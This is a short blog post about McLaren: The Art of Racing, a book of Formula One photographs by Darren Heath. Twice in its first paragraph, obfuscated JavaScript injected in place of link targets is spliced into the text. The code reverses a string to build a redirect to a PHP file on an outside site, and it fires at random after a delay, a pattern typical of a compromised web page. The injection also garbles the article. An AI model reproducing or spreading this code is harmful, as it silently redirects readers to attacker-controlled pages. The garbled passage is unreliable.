You may remember a few months ago Mr Phill Tromans visited $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/lifestyle/mclaren-dubai-part-one-setting-sail/” target=”_blank”>McLaren’s Formula One headquarters in the UK. As we’d expect from the team that has defined ‘meticulous’ in Formula One for the past four decades, nothing was left to chance as Lewis Hamilton’s Championship-winning MP4-22 was $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/lifestyle/mclaren-dubai-part-two-pastures-new/” target=”_blank”>shipped to McLaren’s new Middle East showroom in Dubai. Clean and clinical precision is what the silver-suited men of Woking do best.
Photographer Darren Heath clearly feels the same way. So much so that – with the help of Thomas Manns & Co. – he’s produced a new book of photography, detailing both the day-to-day mechanics of running a full-time F1 team at the sharp end of the grid and the behind the scenes elbow grease that keep the trophies rolling in.
From the research and development at the McLaren Technology Centre to the chequered flag, each of Darren’s images marks a point on the road to Grand Prix victory for McLaren’s F1 stead. That means both Jenson and Lewis get their fair share of lens time too.
Even the finished product is pure McLaren, from the ‘rocket red’ spine to the metalised cover material. You certainly won’t want to put your drink down on it.
Those of you straining at the leash for your copy won’t have to wait long. McLaren: The Art of Racing goes on sale in just over a week’s time.
